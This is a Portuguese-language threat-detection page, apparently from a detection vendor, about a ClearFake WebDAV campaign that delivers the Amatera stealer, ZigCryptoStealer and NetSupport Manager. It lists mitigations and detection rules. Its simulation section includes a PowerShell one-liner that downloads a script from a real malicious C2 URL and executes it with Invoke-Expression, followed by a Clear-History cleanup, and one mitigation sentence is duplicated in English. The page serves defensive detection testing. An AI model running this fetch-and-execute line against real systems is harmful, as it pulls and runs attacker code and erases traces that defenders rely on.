Cadeia de infecção ClearFake WebDAV entrega Amatera stealer, ZigCryptoStealer e NetSupport Manager
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma campanha impulsionada pelo ClearFake está abusando do WebDAV e dos Cloudflare Workers para distribuir múltiplas cargas de malware. A carga principal, Amatera stealer, é projetada para exfiltrar credenciais e dados relacionados a criptomoedas. Cargas adicionais incluem ZigCryptoStealer, entregue através de um carregador NativeAOT, e instâncias não autorizadas do NetSupport Manager usadas para estabelecer acesso remoto.
Investigação
A Cisco Talos investigou a execução de DLLs suspeitas baseadas em WebDAV em uma organização governamental ucraniana. A análise revelou duas cadeias de infecção separadas: uma aproveitando um pf.ch carregador para implantar ZigCryptoStealer e um proxy reverso baseado em Go, e outra usando um verification.google carregador para instalar o NetSupport Manager.
Mitigação
As organizações devem restringir a execução a partir de caminhos WebDAV e UNC e monitorar comportamentos anômalos de rundll32.exe. Controles robustos de EDR devem ser usados para detectar técnicas como DLL hollowing e module stomping. As equipes de segurança também devem monitorar o uso não autorizado do NetSupport Manager e atividades suspeitas relacionadas à rede blockchain. behavior. Robust EDR controls should be used to detect techniques such as DLL hollowing and module stomping. Security teams should also monitor unauthorized NetSupport Manager usage and suspicious blockchain-related network activity.
Resposta
Caso atividade maliciosa seja detectada, os endpoints afetados devem ser isolados imediatamente para evitar a exfiltração adicional de dados. Os respondentes devem realizar forense de memória para identificar malwares residentes, como o Amatera. As equipes de segurança também devem buscar por execução de DLLs baseadas em WebDAV e atividades incomuns do PowerShell em todo o ambiente.
Fluxo de Ataques
Ainda estamos atualizando esta parte.
Detecções
Cadeias de Caracteres Suspeitas de PowerShell (via powershell)
LOLBAS Conhost (via cmdline)
Indicadores Possíveis de Ofuscação do PowerShell (via powershell)
Possível Abuso de Telegram Como Canal de Comando e Controle (via dns_query)
Comando e Controle Suspeito por Pedido DNS de Domínio de Primeiro Nível (TLD) Incomum (via dns)
IOCs (SourceIP) a detectar: cadeia de infecção ClearFake WebDAV distribui o Amatera stealer, ZigCryptoStealer e NetSupport Manager
IOCs (DestinationIP) a detectar: cadeia de infecção ClearFake WebDAV distribui o Amatera stealer, ZigCryptoStealer e NetSupport Manager
Comunicação C2 Sobre WebSocket Seguro Com Dubbedmuch Para Exfiltração de Dados [Proxy]
Detectar Download e Execução de Script PowerShell do NetSupport Manager [Windows Powershell]
Execução de DLL WebDAV via rundll32.exe [Criação de Processo do Windows]
Execução de Simulação
Pré-requisito: O Check de Pré-Voo de Telemetria e Baseline deve ter sido aprovado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente as TTPs identificadas e tem como objetivo gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão ao diagnóstico incorreto.
-
Narrativa de Ataque & Comandos: O adversário está simulando uma cadeia de infecção do “ClearFake”. O objetivo é implantar a ferramenta de acesso remoto NetSupport Manager para estabelecer persistência e controle remoto. Para evitar a detecção baseada em assinaturas de downloads de arquivos, o invasor usa um “one-liner” PowerShell que busca uma carga útil JavaScript/PowerShell de um servidor C2 remoto (
https://kr.cedar2glanz.ru/jewel.js) e a executa diretamente no buffer de memória usandoInvoke-Expression. Esta técnica deixa uma pegada mínima de disco. -
Script de Teste de Regressão:
# Script de Simulação: Imita a execução da carga útil da cadeia de infecção ClearFake # ATENÇÃO: Este script usa o URL malicioso específico definido na regra de detecção para desencadear um alerta. $maliciousUrl = "https://kr.cedar2glanz.ru/jewel.js" Write-Host "[+] Simulando download e execução maliciosos de PowerShell..." -ForegroundColor Yellow # Este comando imita o padrão exato: URL + IEX/Invoke-Expression # Utilizamos um bloco try/catch porque o URL está de fato inacessível/inativo, # mas a LINHA DE COMANDO DO PROCESSO ainda será registrada. try { Invoke-Expression (New-Object Net.WebClient).DownloadString($maliciousUrl) } catch { Write-Host "[!] Comando executado (Erro de rede esperado, mas a telemetria deve ser gerada)." -ForegroundColor Cyan } -
Comandos de Limpeza:
# Nenhum arquivo é criado por esta simulação específica, pois é um teste de execução na memória. # No entanto, limpamos o histórico de comandos para remover vestígios da sessão de usuário local. Clear-History Write-Host "[+] Limpeza concluída. Nenhum artefato deixado no disco." -ForegroundColor Green